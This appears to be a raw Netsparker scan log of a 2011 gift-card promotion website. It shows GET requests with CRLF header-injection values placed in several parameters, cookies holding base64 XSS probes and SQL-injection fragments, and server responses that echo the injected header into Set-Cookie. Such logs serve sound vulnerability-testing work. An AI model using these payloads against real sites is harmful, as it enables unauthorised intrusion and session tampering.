<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-int-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=3&user_pin_id=20049..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg-int
mode GET exit
exit_num GET 3
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET http://example.com/? ns: netsparker056650=vuln
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg-int&mode=exit&exit_num=3&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: gift_cookie=29617; promo_cookie=v4|207753-14843-:1303916209; scook=1303916209; k=5113356; v=5113356; (CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==; concat(CONCAT(CHAR(95)=; CHAR(33)=; CHAR(64)=; CHAR(52)=; CHAR(100)=; CHAR(105)=; CHAR(108)=; CHAR(101)=; CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:57:51 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82eef135dcehf;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=http://example.com/?
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
ns: netsparker056650=vuln;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Bonus</title>



<style>
body {
font-family: Arial, Helvetica, sans-serif;
height:100%;
width:100%;
margin:0;
padding:0;
}
#content {
width:550px;
background-color:#FFF;
background-position:top center;
margin-left: auto;
margin-right: auto;
}
#hdr, #selecthdr {
text-align: center;
margin-left: 20px;
}
.visual-style {
width: 315px;
}
.pic {
float:left;
}
.hyrlnk {
float:left;
margin-top: 28px;
margin-left: 10px;
}
.hyrlnk a {
font-size: 16px;
font-weight: bold;
color: #000000;
}

div.spacer10{
height:12px;
font-size:12px;
}


#more {
margin-left:auto;
margin-right:auto;
font-weight:bold;
font-size: 26px;
color: #053C97;
}

#r1, #r7, #r13, #r19, #r25, #r31, #r37, #r43, #r49, #r55 {
background-image:url(http://i.pcp001.com/media/bn/b-blue.gif); background-repeat:no-repeat; width: 447px; height: 92px; text-align: center; margin-left: 75px;
}
#r2, #r8, #r14, #r20, #r26, #r32, #r38, #r44, #r50, #r56 {
background-image:url(http://i.pcp001.com/media/bn/b-yellow.gif); background-repeat:no-repeat; width: 417px; height: 92px; text-align: center; margin-left: 75px;
}
#r3, #r9, #r15, #r21, #r27, #r33, #r39, #r45, #r51, #r57 {
background-image:url(http://i.pcp001.com/media/bn/b-green.gif); background-repeat:no-repeat; width: 417px; height: 92px; text-align: center; margin-left: 75px;
}
#r4, #r10, #r16, #r22, #r28, #r34, #r40, #r46, #r52, #r58 {
background-image:url(http://i.pcp001.com/media/bn/b-grey.gif); background-repeat:no-repeat; width: 417px; height: 92px; text-align: center; margin-left: 75px;
}
#r5, #r11, #r17, #r23, #r29, #r35, #r41, #r47, #r53, #r59 {
background-image:url(http://i.pcp001.com/media/bn/b-purple.gif); background-repeat:no-repeat; width: 417px; height: 92px; text-align: center; margin-left: 75px;
}
#r6, #r12, #r18, #r24, #r30, #r36, #r42, #r48, #r54, #r60 {
background-image:url(http://i.pcp001.com/media/bn/b-red.gif); background-repeat:no-repeat; width: 417px; height: 92px; text-align: center; margin-left: 75px;
}
</style>


</head>

<body onUnLoad="x_win();" BGCOLOR=#FFFFFF TEXT=#000000 LINK=#0000FF VLINK=#0000FF ALINK=#FF0000>

<div id="content">
<div id="hdr"><img src="http://i.pcp001.com/media/bn/bonus-imghdr.jpg" width="439" height="187"></div>
<div id="selecthdr"><img src="http://i.pcp001.com/media/bn/b-selecthdr.jpg" width="269" height="29"></div>
<div class="spacer10">&nbsp;</div>


<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">



</table>
<div class="spacer10">&nbsp;</div>

<div id="more" align="center" STYLE='display:none;'><a href="?SID=f05c7ce946bc38d8bfa6b839a4d56265" >CONTINUE WHEN FINISHED</a></div>



</BODY>
</HTML>
- /ups.htm

/ups.htm

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=http://example.com/%3f%0D%0Ans..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET http://example.com/? ns: netsparker056650=vuln
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==; concat(CONCAT(CHAR(95)=; CHAR(33)=; CHAR(64)=; CHAR(52)=; CHAR(100)=; CHAR(105)=; CHAR(108)=; CHAR(101)=; CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1); JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:02:44 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db83015159a6r8f;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=http://example.com/?,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
ns: netsparker056650=vuln;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=http://example.com/?
ns: netsparker056650=vuln&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $50 Gift Card.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle"> $50 Gift Card</span> <br />
<span style="margin-left: 30px;"><img src="http://www.theuseful.com/media/freegiftcard_reserved_287x180.gif" width="200" height="126"></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $50 Gift Card, start by completing any 6 of the offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=http://example.com/?
ns: netsparker056650=vuln&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 6 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg&user_pin_id=http://example.com/?
ns: netsparker056650=vuln&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" target="_blank" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=71&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=71&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=http://examp..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET http://example.com/? ns: netsparker056650=vuln
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==; concat(CONCAT(CHAR(95)=; CHAR(33)=; CHAR(64)=; CHAR(52)=; CHAR(100)=; CHAR(105)=; CHAR(108)=; CHAR(101)=; CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1); JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:02:51 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db8301b80850aw1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=http://example.com/?,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
ns: netsparker056650=vuln;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
